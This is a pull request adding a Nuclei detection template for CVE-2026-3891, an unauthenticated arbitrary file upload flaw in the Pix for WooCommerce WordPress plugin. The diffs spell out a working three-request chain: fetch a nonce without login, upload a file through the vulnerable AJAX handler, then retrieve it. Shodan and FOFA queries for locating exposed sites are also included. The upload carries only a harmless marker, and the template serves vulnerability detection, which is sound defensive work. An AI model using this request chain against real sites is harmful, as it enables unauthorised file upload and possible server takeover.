### PR TITLE
Add CVE-2026-3891 template for Pix for WooCommerce arbitrary file upload

### DIFF
--- a/http/cves/2026/CVE-2026-3891.yaml
+++ b/http/cves/2026/CVE-2026-3891.yaml
@@ -1,0 +1,102 @@
+id: CVE-2026-3891
+
+info:
+  name: Pix for WooCommerce <= 1.5.0 - Unauthenticated Arbitrary File Upload
+  author: m4sh_wacker
+  severity: critical
+  description: |
+    Pix for WooCommerce plugin versions up to and including 1.5.0 are
+    vulnerable to unauthenticated arbitrary file upload due to missing
+    authorization checks and insufficient file type validation.
+    This template safely verifies the vulnerability by uploading and
+    retrieving a harmless TXT marker file.
+  reference:
+    - https://github.com/m4sh-wacker/CVE-2026-3891-Pix-for-WooCommerce-Plugin-Exploit
+  classification:
+    cve-id: CVE-2026-3891
+    cwe-id: CWE-434
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+  tags: cve,cve2026,wordpress,wp-plugin,file-upload
+
+flow: http(1) && http(2) && http(3)
+
+variables:
+  filename: "nuclei-test.txt"
+  marker: "CVE-2026-3891-NUCLEI-TEST"
+
+http:
+  # Step 1 - Obtain nonce
+  - id: nonce
+
+    method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: "action=lkn_pix_for_woocommerce_generate_nonce&action_name=lkn_pix_for_woocommerce_c6_settings_nonce"
+
+    extractors:
+      - type: json
+        name: nonce
+        internal: true
+        json:
+          - ".data.nonce"
+
+    matchers:
+      - type: word
+        internal: true
+        part: body
+        words:
+          - '"success":true'
+
+  # Step 2 - Upload harmless TXT marker
+  - id: upload
+
+    raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----m4shBoundary
+
+        ------m4shBoundary
+        Content-Disposition: form-data; name="action"
+
+        lkn_pix_for_woocommerce_c6_save_settings
+        ------m4shBoundary
+        Content-Disposition: form-data; name="_ajax_nonce"
+
+        {{nonce}}
+        ------m4shBoundary
+        Content-Disposition: form-data; name="certificate_crt_path"; filename="{{filename}}"
+        Content-Type: text/plain
+
+        {{marker}}
+        ------m4shBoundary--
+
+    matchers:
+      - type: word
+        internal: true
+        part: body
+        words:
+          - "Settings saved successfully"
+
+  # Step 3 - Verify uploaded marker
+  - id: verify
+
+    method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/{{filename}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "CVE-2026-3891-NUCLEI-TEST"

--- a/http/cves/2026/CVE-2026-3891.yaml
+++ b/http/cves/2026/CVE-2026-3891.yaml
@@ -5,38 +5,53 @@ info:
   author: m4sh_wacker
   severity: critical
   description: |
-    Pix for WooCommerce plugin versions up to and including 1.5.0 are
-    vulnerable to unauthenticated arbitrary file upload due to missing
-    authorization checks and insufficient file type validation.
-    This template safely verifies the vulnerability by uploading and
-    retrieving a harmless TXT marker file.
+    The Pix for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check and missing file type validation in the 'lkn_pix_for_woocommerce_c6_save_settings' function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
+  impact: |
+    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
+  remediation: |
+    Update to the latest version of Pix for WooCommerce plugin.
   reference:
     - https://github.com/m4sh-wacker/CVE-2026-3891-Pix-for-WooCommerce-Plugin-Exploit
+    - https://wordpress.org/plugins/payment-gateway-pix-for-woocommerce/
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2026-3891
     cwe-id: CWE-434
-    cvss-score: 9.8
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-  tags: cve,cve2026,wordpress,wp-plugin,file-upload
+    cpe: cpe:2.3:a:linknacional:payment_gateway_pix_for_woocommerce:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: linknacional
+    product: payment_gateway_pix_for_woocommerce
+    framework: wordpress
+    shodan-query: http.html:"/wp-content/plugins/payment-gateway-pix-for-woocommerce"
+    fofa-query: body="/wp-content/plugins/payment-gateway-pix-for-woocommerce"
+  tags: cve,cve2026,wordpress,wp,wp-plugin,woocommerce,file-upload,unauth,intrusive,rce
 
 flow: http(1) && http(2) && http(3)
 
 variables:
-  filename: "nuclei-test.txt"
-  marker: "CVE-2026-3891-NUCLEI-TEST"
+  marker: "{{randstr}}"
+  fname: "{{rand_base(8)}}"
+  boundary_id: "{{rand_int(100000, 999999)}}"
 
 http:
-  # Step 1 - Obtain nonce
-  - id: nonce
-
+  - id: step-1
     method: POST
     path:
       - "{{BaseURL}}/wp-admin/admin-ajax.php"
-
     headers:
       Content-Type: application/x-www-form-urlencoded
-
     body: "action=lkn_pix_for_woocommerce_generate_nonce&action_name=lkn_pix_for_woocommerce_c6_settings_nonce"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, '\"success\":true')"
+        condition: and
+        internal: true
 
     extractors:
       - type: json
@@ -45,58 +60,48 @@ http:
         json:
           - ".data.nonce"
 
-    matchers:
-      - type: word
-        internal: true
-        part: body
-        words:
-          - '"success":true'
-
-  # Step 2 - Upload harmless TXT marker
-  - id: upload
-
+  - id: step-2
     raw:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=----m4shBoundary
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary_id}}
 
-        ------m4shBoundary
+        ------WebKitFormBoundary{{boundary_id}}
         Content-Disposition: form-data; name="action"
 
         lkn_pix_for_woocommerce_c6_save_settings
-        ------m4shBoundary
+        ------WebKitFormBoundary{{boundary_id}}
         Content-Disposition: form-data; name="_ajax_nonce"
 
         {{nonce}}
-        ------m4shBoundary
-        Content-Disposition: form-data; name="certificate_crt_path"; filename="{{filename}}"
-        Content-Type: text/plain
+        ------WebKitFormBoundary{{boundary_id}}
+        Content-Disposition: form-data; name="certificate_crt_path"; filename="{{fname}}.crt"
+        Content-Type: application/x-x509-ca-cert
 
         {{marker}}
-        ------m4shBoundary--
+        ------WebKitFormBoundary{{boundary_id}}--
 
     matchers:
-      - type: word
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, 'Settings saved successfully')"
+        condition: and
         internal: true
-        part: body
-        words:
-          - "Settings saved successfully"
 
-  # Step 3 - Verify uploaded marker
-  - id: verify
-
+  - id: step-3
     method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/{{filename}}"
+      - "{{BaseURL}}/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/{{fname}}.crt"
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
-          - "CVE-2026-3891-NUCLEI-TEST"
+          - "{{marker}}"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Description

This PR adds a Nuclei template for **CVE-2026-3891**, an unauthenticated arbitrary file upload vulnerability affecting the **Pix for WooCommerce** WordPress plugin versions up to and including **1.5.0**.

The template verifies the vulnerability by:

* Obtaining the required nonce without authentication.
* Uploading a harmless TXT marker file through the vulnerable AJAX handler.
* Retrieving the uploaded file and verifying its unique marker content.

No executable payload is uploaded during detection.

## References

* CVE-2026-3891
* PoC: https://github.com/m4sh-wacker/CVE-2026-3891-Pix-for-WooCommerce-Plugin-Exploit

## Testing

The template has been tested successfully against a local vulnerable WordPress installation running **Pix for WooCommerce 1.5.0**.
